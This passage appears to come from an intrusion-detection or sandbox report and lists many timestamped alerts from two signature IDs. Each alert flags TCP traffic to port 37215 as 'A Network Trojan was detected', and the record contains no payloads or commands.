            Timestamp:05/28/24-09:56:58.771755
            SID:2829579
            Source Port:55076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767183
            SID:2835222
            Source Port:54108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776876
            SID:2835222
            Source Port:49272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793566
            SID:2835222
            Source Port:52112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725686
            SID:2835222
            Source Port:53078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716509
            SID:2835222
            Source Port:49932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873516
            SID:2835222
            Source Port:40830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385461
            SID:2835222
            Source Port:34002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859701
            SID:2835222
            Source Port:53052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.939067
            SID:2829579
            Source Port:37696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445194
            SID:2829579
            Source Port:44492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507095
            SID:2835222
            Source Port:54326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713261
            SID:2835222
            Source Port:48732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775494
            SID:2829579
            Source Port:57444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040688
            SID:2829579
            Source Port:36730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849657
            SID:2835222
            Source Port:37146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993164
            SID:2829579
            Source Port:34266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293810
            SID:2829579
            Source Port:45698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732644
            SID:2835222
            Source Port:42612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.947489
            SID:2829579
            Source Port:34292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.580149
            SID:2829579
            Source Port:36500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261844
            SID:2829579
            Source Port:46308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.993385
            SID:2829579
            Source Port:54334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824504
            SID:2829579
            Source Port:58814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394321
            SID:2829579
            Source Port:49588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873159
            SID:2835222
            Source Port:41616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046109
            SID:2829579
            Source Port:34962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392781
            SID:2835222
            Source Port:48432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916564
            SID:2835222
            Source Port:47108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639913
            SID:2835222
            Source Port:50160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852722
            SID:2829579
            Source Port:53808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069866
            SID:2829579
            Source Port:55252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005190
            SID:2835222
            Source Port:60110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.333908
            SID:2835222
            Source Port:51002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568275
            SID:2835222
            Source Port:56106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.356956
            SID:2835222
            Source Port:57756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321192
            SID:2829579
            Source Port:45730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757388
            SID:2835222
            Source Port:41518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815005
            SID:2835222
            Source Port:37694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848299
            SID:2835222
            Source Port:44388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768004
            SID:2835222
            Source Port:50550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869738
            SID:2829579
            Source Port:57770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989891
            SID:2829579
            Source Port:56328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.382760
            SID:2829579
            Source Port:56610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.602390
            SID:2835222
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997911
            SID:2835222
            Source Port:40674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767663
            SID:2835222
            Source Port:54354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779106
            SID:2829579
            Source Port:34190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840062
            SID:2835222
            Source Port:52038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989117
            SID:2829579
            Source Port:37106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948867
            SID:2835222
            Source Port:41140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.062177
            SID:2829579
            Source Port:46614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852762
            SID:2829579
            Source Port:34674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052442
            SID:2829579
            Source Port:34048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930139
            SID:2835222
            Source Port:49506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507225
            SID:2835222
            Source Port:42328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876164
            SID:2829579
            Source Port:38314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.656458
            SID:2829579
            Source Port:52578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885577
            SID:2829579
            Source Port:39792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491363
            SID:2829579
            Source Port:51480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984808
            SID:2835222
            Source Port:50798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754785
            SID:2835222
            Source Port:53484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918770
            SID:2829579
            Source Port:55354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.540456
            SID:2835222
            Source Port:47204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833783
            SID:2829579
            Source Port:54338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058156
            SID:2829579
            Source Port:55884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.373781
            SID:2829579
            Source Port:32932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.494554
            SID:2835222
            Source Port:55130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968438
            SID:2835222
            Source Port:47626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423326
            SID:2829579
            Source Port:33082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423984
            SID:2829579
            Source Port:50358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543231
            SID:2835222
            Source Port:56928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.622706
            SID:2829579
            Source Port:39838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760365
            SID:2835222
            Source Port:40280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533357
            SID:2829579
            Source Port:50208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639545
            SID:2829579
            Source Port:45466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852231
            SID:2829579
            Source Port:45188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.780190
            SID:2829579
            Source Port:58350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735943
            SID:2835222
            Source Port:57644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432763
            SID:2835222
            Source Port:53986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086439
            SID:2835222
            Source Port:38424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916926
            SID:2835222
            Source Port:53996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663892
            SID:2835222
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.865017
            SID:2829579
            Source Port:58490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374024
            SID:2835222
            Source Port:55290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070352
            SID:2835222
            Source Port:48662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930027
            SID:2835222
            Source Port:38514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251916
            SID:2829579
            Source Port:60060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261418
            SID:2829579
            Source Port:58624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699652
            SID:2835222
            Source Port:50566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346357
            SID:2835222
            Source Port:48992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.893292
            SID:2835222
            Source Port:55490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291247
            SID:2829579
            Source Port:58116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772249
            SID:2835222
            Source Port:39468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995284
            SID:2829579
            Source Port:33252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738610
            SID:2829579
            Source Port:39856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864335
            SID:2829579
            Source Port:37230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691764
            SID:2829579
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804770
            SID:2829579
            Source Port:37098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.874993
            SID:2835222
            Source Port:55004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.918880
            SID:2829579
            Source Port:52758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065566
            SID:2829579
            Source Port:36844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.618173
            SID:2835222
            Source Port:33818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994866
            SID:2835222
            Source Port:54000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760088
            SID:2829579
            Source Port:54498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967795
            SID:2829579
            Source Port:58190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803809
            SID:2829579
            Source Port:48554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015395
            SID:2835222
            Source Port:36306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.368975
            SID:2835222
            Source Port:54742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952944
            SID:2835222
            Source Port:45190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.934987
            SID:2829579
            Source Port:45998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879457
            SID:2829579
            Source Port:58916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951344
            SID:2835222
            Source Port:34350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275211
            SID:2835222
            Source Port:55022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804564
            SID:2835222
            Source Port:54296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739603
            SID:2829579
            Source Port:48652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880331
            SID:2835222
            Source Port:45760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.596594
            SID:2835222
            Source Port:50640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.661512
            SID:2835222
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.740817
            SID:2829579
            Source Port:46206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868462
            SID:2835222
            Source Port:52198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507091
            SID:2835222
            Source Port:60522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956945
            SID:2829579
            Source Port:47748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961510
            SID:2835222
            Source Port:48230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905546
            SID:2835222
            Source Port:44932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816600
            SID:2829579
            Source Port:37168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770916
            SID:2829579
            Source Port:54848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917180
            SID:2829579
            Source Port:37874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895105
            SID:2835222
            Source Port:40140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048170
            SID:2829579
            Source Port:49888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290980
            SID:2835222
            Source Port:52998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078529
            SID:2829579
            Source Port:53500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348909
            SID:2829579
            Source Port:59546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703199
            SID:2835222
            Source Port:47826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041553
            SID:2835222
            Source Port:59938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840871
            SID:2829579
            Source Port:41894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003868
            SID:2835222
            Source Port:39086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.933976
            SID:2829579
            Source Port:57390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.221982
            SID:2835222
            Source Port:37196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.618434
            SID:2835222
            Source Port:56730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713514
            SID:2829579
            Source Port:56582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084607
            SID:2835222
            Source Port:43998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661629
            SID:2829579
            Source Port:36846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398021
            SID:2835222
            Source Port:39074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376961
            SID:2835222
            Source Port:50762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604665
            SID:2829579
            Source Port:49262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.949764
            SID:2835222
            Source Port:56364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770921
            SID:2835222
            Source Port:59862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849369
            SID:2835222
            Source Port:37848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326012
            SID:2829579
            Source Port:38870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347365
            SID:2835222
            Source Port:45128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774061
            SID:2829579
            Source Port:42390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334396
            SID:2829579
            Source Port:38198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657356
            SID:2835222
            Source Port:47088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941512
            SID:2829579
            Source Port:34832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392554
            SID:2829579
            Source Port:37244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060359
            SID:2829579
            Source Port:38846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911992
            SID:2829579
            Source Port:32804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943643
            SID:2829579
            Source Port:39962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842866
            SID:2835222
            Source Port:50116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870447
            SID:2835222
            Source Port:54000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878770
            SID:2835222
            Source Port:45436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604902
            SID:2829579
            Source Port:32912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723727
            SID:2835222
            Source Port:33084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841805
            SID:2829579
            Source Port:35954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414273
            SID:2835222
            Source Port:36936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374557
            SID:2835222
            Source Port:51642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507800
            SID:2829579
            Source Port:36542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.670980
            SID:2835222
            Source Port:49040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766989
            SID:2829579
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995624
            SID:2835222
            Source Port:51366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817471
            SID:2829579
            Source Port:48456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260809
            SID:2835222
            Source Port:44078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773817
            SID:2835222
            Source Port:45624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.332484
            SID:2829579
            Source Port:48686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728174
            SID:2835222
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740486
            SID:2835222
            Source Port:47860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854063
            SID:2829579
            Source Port:46996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069607
            SID:2835222
            Source Port:57358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893271
            SID:2835222
            Source Port:37704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730665
            SID:2835222
            Source Port:33376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052903
            SID:2829579
            Source Port:60832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953671
            SID:2835222
            Source Port:51200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670269
            SID:2835222
            Source Port:52630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738494
            SID:2829579
            Source Port:57906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862712
            SID:2829579
            Source Port:58386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321281
            SID:2829579
            Source Port:40102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.123723
            SID:2829579
            Source Port:51316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374472
            SID:2829579
            Source Port:51166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.664257
            SID:2829579
            Source Port:59696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755881
            SID:2829579
            Source Port:52464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935292
            SID:2829579
            Source Port:47434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765602
            SID:2835222
            Source Port:49986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825188
            SID:2835222
            Source Port:55940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349305
            SID:2829579
            Source Port:51446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549688
            SID:2829579
            Source Port:34794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040376
            SID:2835222
            Source Port:52688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051851
